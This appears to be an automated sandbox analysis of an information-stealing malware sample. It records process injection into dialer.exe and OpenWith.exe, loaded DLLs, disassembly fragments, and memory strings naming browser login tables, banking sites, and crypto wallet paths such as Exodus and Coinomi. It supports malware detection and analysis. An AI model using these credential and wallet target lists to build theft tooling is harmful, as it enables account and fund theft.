Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0 |
Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s; |
Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s; |
Source: OpenWith.exe, 00000003.00000003.2320449048.0000025B16DB7000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2322773513.0000025B16DB8000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: CREATE TABLE sqlite_sequence(name,seq) AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)framework; |
Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger'); |
Source: OpenWith.exe, 00000003.00000003.2319637690.0000025B1705F000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17020000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319529034.0000025B1705F000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2330694334.0000025B17000000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2330260861.0000025B17050000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key)); |
Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: tapi32.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: wbemcomn.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: powrprof.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: umpdc.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: wbemcomn.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: wbemcomn.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
Section loaded: netapi32.dll |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
Section loaded: dpapi.dll |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
Section loaded: wkscli.dll |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
Section loaded: cscapi.dll |
Jump to behavior |
Source: |
Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831L source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: wkernel32.pdb source: wdeeFKntav.exe, 00000000.00000003.2112932104.00000000046E0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112870082.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115365389.0000000002D10000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115429018.0000000004E30000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: wkernelbase.pdb source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: ntdll.pdb source: wdeeFKntav.exe, 00000000.00000003.2111775317.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112323721.00000000047B0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114700103.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114865216.0000000004FA0000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: wntdll.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2112545924.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112684749.0000000004760000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115217738.0000000004F50000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115079095.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: ntdll.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2111775317.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112323721.00000000047B0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114700103.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114865216.0000000004FA0000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: wntdll.pdb source: wdeeFKntav.exe, 00000000.00000003.2112545924.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112684749.0000000004760000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115217738.0000000004F50000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115079095.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: wkernelbase.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: wkernel32.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2112932104.00000000046E0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112870082.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115365389.0000000002D10000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115429018.0000000004E30000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbf source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp |
Source: 3.3.OpenWith.exe.25b16e1aad0.8.raw.unpack, Runtime.cs |
.Net Code: CoreMain System.Reflection.Assembly.Load(byte[]) |
Source: 3.3.OpenWith.exe.25b16e1aad0.8.raw.unpack, Runtime.cs |
.Net Code: CoreMain |
Source: 3.3.OpenWith.exe.25b16e1aad0.4.raw.unpack, Runtime.cs |
.Net Code: CoreMain System.Reflection.Assembly.Load(byte[]) |
Source: 3.3.OpenWith.exe.25b16e1aad0.4.raw.unpack, Runtime.cs |
.Net Code: CoreMain |
Source: 3.3.OpenWith.exe.25b16e1aad0.10.raw.unpack, Runtime.cs |
.Net Code: CoreMain System.Reflection.Assembly.Load(byte[]) |
Source: 3.3.OpenWith.exe.25b16e1aad0.10.raw.unpack, Runtime.cs |
.Net Code: CoreMain |
Source: 3.3.OpenWith.exe.25b16e1aad0.16.raw.unpack, Runtime.cs |
.Net Code: CoreMain System.Reflection.Assembly.Load(byte[]) |
Source: 3.3.OpenWith.exe.25b16e1aad0.16.raw.unpack, Runtime.cs |
.Net Code: CoreMain |
Source: 3.3.OpenWith.exe.25b16e1aad0.13.raw.unpack, Runtime.cs |
.Net Code: CoreMain System.Reflection.Assembly.Load(byte[]) |
Source: 3.3.OpenWith.exe.25b16e1aad0.13.raw.unpack, Runtime.cs |
.Net Code: CoreMain |
Source: 3.3.OpenWith.exe.25b16e1aad0.0.raw.unpack, Runtime.cs |
.Net Code: CoreMain System.Reflection.Assembly.Load(byte[]) |
Source: 3.3.OpenWith.exe.25b16e1aad0.0.raw.unpack, Runtime.cs |
.Net Code: CoreMain |
Source: 3.2.OpenWith.exe.25b16e1aad0.1.raw.unpack, Runtime.cs |
.Net Code: CoreMain System.Reflection.Assembly.Load(byte[]) |
Source: 3.2.OpenWith.exe.25b16e1aad0.1.raw.unpack, Runtime.cs |
.Net Code: CoreMain |
Source: 3.3.OpenWith.exe.25b16e1aad0.6.raw.unpack, Runtime.cs |
.Net Code: CoreMain System.Reflection.Assembly.Load(byte[]) |
Source: 3.3.OpenWith.exe.25b16e1aad0.6.raw.unpack, Runtime.cs |
.Net Code: CoreMain |
Source: 3.3.OpenWith.exe.25b16e1aad0.14.raw.unpack, Runtime.cs |
.Net Code: CoreMain System.Reflection.Assembly.Load(byte[]) |
Source: 3.3.OpenWith.exe.25b16e1aad0.14.raw.unpack, Runtime.cs |
.Net Code: CoreMain |
Source: 3.3.OpenWith.exe.25b16e1aad0.5.raw.unpack, Runtime.cs |
.Net Code: CoreMain System.Reflection.Assembly.Load(byte[]) |
Source: 3.3.OpenWith.exe.25b16e1aad0.5.raw.unpack, Runtime.cs |
.Net Code: CoreMain |
Source: 3.3.OpenWith.exe.25b16e1aad0.2.raw.unpack, Runtime.cs |
.Net Code: CoreMain System.Reflection.Assembly.Load(byte[]) |
Source: 3.3.OpenWith.exe.25b16e1aad0.2.raw.unpack, Runtime.cs |
.Net Code: CoreMain |
Source: 3.3.OpenWith.exe.25b16e1aad0.7.raw.unpack, Runtime.cs |
.Net Code: CoreMain System.Reflection.Assembly.Load(byte[]) |
Source: 3.3.OpenWith.exe.25b16e1aad0.7.raw.unpack, Runtime.cs |
.Net Code: CoreMain |
Source: 3.3.OpenWith.exe.25b16e1aad0.3.raw.unpack, Runtime.cs |
.Net Code: CoreMain System.Reflection.Assembly.Load(byte[]) |
Source: 3.3.OpenWith.exe.25b16e1aad0.3.raw.unpack, Runtime.cs |
.Net Code: CoreMain |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_3_00CC5AF4 pushad ; retf |
0_3_00CC5B03 |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_3_00CC6285 push F693B671h; retf |
0_3_00CC628A |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_3_00CC7C52 push dword ptr [edx+ebp+3Bh]; retf |
0_3_00CC7C5F |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_3_00CC5DCE push edi; iretd |
0_3_00CC5DD5 |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_3_00CC2F4E push eax; retf |
0_3_00CC2F4F |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_3_00CC6F48 push es; ret |
0_3_00CC6F49 |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_3_00CC416F push ecx; iretd |
0_3_00CC417B |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_3_00CC657C push esi; ret |
0_3_00CC6580 |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_3_00CC412F pushad ; ret |
0_3_00CC4137 |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_2_00C79429 push cs; retf |
0_2_00C79565 |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_2_00C78964 push ebx; retf |
0_2_00C78965 |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_2_00C7750E push ds; iretd |
0_2_00C77517 |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_2_00C81269 push edx; retf |
0_2_00C81422 |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_2_00C7FF22 push edi; iretd |
0_2_00C7FF2D |
Source: C:\Windows\SysWOW64\dialer.exe |
Code function: 2_3_02723E4E push edi; iretd |
2_3_02723E55 |
Source: C:\Windows\SysWOW64\dialer.exe |
Code function: 2_3_02725CD2 push dword ptr [edx+ebp+3Bh]; retf |
2_3_02725CDF |
Source: C:\Windows\SysWOW64\dialer.exe |
Code function: 2_3_02723B74 pushad ; retf |
2_3_02723B83 |
Source: C:\Windows\SysWOW64\dialer.exe |
Code function: 2_3_02724305 push F693B671h; retf |
2_3_0272430A |
Source: C:\Windows\SysWOW64\dialer.exe |
Code function: 2_3_027245FC push esi; ret |
2_3_02724600 |
Source: C:\Windows\SysWOW64\dialer.exe |
Code function: 2_3_027221EF push ecx; iretd |
2_3_027221FB |
Source: C:\Windows\SysWOW64\dialer.exe |
Code function: 2_3_02724FC8 push es; ret |
2_3_02724FC9 |
Source: C:\Windows\SysWOW64\dialer.exe |
Code function: 2_3_02720FCE push eax; retf |
2_3_02720FCF |
Source: C:\Windows\SysWOW64\dialer.exe |
Code function: 2_3_027221AF pushad ; ret |
2_3_027221B7 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F044CA0 push edx; ret |
3_2_00007DF41F044CAB |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F049D1E push esi; retf 000Ah |
3_2_00007DF41F049D1F |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552 |
Source: OpenWith.exe, 00000003.00000003.2332693555.0000025B16D94000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLinkcLinkSymbolicLink |
Source: OpenWith.exe, 00000003.00000003.2327644911.0000025B16FFB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYnCQQNUD+ |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: account.microsoft.com/profileVMware20,11696487552u |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: discord.comVMware20,11696487552f |
Source: OpenWith.exe, 00000003.00000003.2339792801.0000025B16DB4000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkmbolicLinkSymbolicLink |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: bankofamerica.comVMware20,11696487552x |
Source: OpenWith.exe, 00000003.00000003.2339792801.0000025B16DB4000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkLinkcLinkSymbolicLink |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: www.interactivebrokers.comVMware20,11696487552} |
Source: dialer.exe, 00000002.00000002.2240725076.0000000002BA8000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3331408408.0000025B14E80000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ms.portal.azure.comVMware20,11696487552 |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552 |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552 |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: global block list test formVMware20,11696487552 |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: tasks.office.comVMware20,11696487552o |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: AMC password management pageVMware20,11696487552 |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: interactivebrokers.co.inVMware20,11696487552d |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: interactivebrokers.comVMware20,11696487552 |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dev.azure.comVMware20,11696487552j |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - HKVMware20,11696487552] |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: netportal.hdfcbank.comVMware20,11696487552 |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~ |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: outlook.office365.comVMware20,11696487552t |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^ |
Source: dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: DisableGuestVmNetworkConnectivity |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: outlook.office.comVMware20,11696487552s |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552 |
Source: dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: EnableGuestVmNetworkConnectivity |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: turbotax.intuit.comVMware20,11696487552t |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696487552x |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696487552} |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552 |
Source: OpenWith.exe, 00000003.00000003.2331811835.0000025B16E48000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: !CP:Defichain-Electrum |
Source: OpenWith.exe, 00000003.00000003.2319977059.0000025B16E29000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: %AppData%\ElectronCash\config |
Source: OpenWith.exe, 00000003.00000003.2331811835.0000025B16E48000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: %AppData%\com.liberty.jaxx |
Source: OpenWith.exe, 00000003.00000003.2287811243.0000025B16D6A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: %AppData%\Exodus\exodus.wallet |
Source: OpenWith.exe, 00000003.00000003.2287811243.0000025B16D6A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: passphrase.json |
Source: OpenWith.exe, 00000003.00000003.2287811243.0000025B16D6A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: %AppData%\Exodus\exodus.wallet |
Source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: \??\C:\Users\user\AppData\Roaming\BinanceP |
Source: OpenWith.exe, 00000003.00000003.2318510901.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: %AppData%\Coinomi\Coinomi\wallets |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings\main\ms-language-packs |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\safebrowsing\google4 |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings |
Jump to behavior |
Source: C:\Windows\System32\OpenWith.exe |
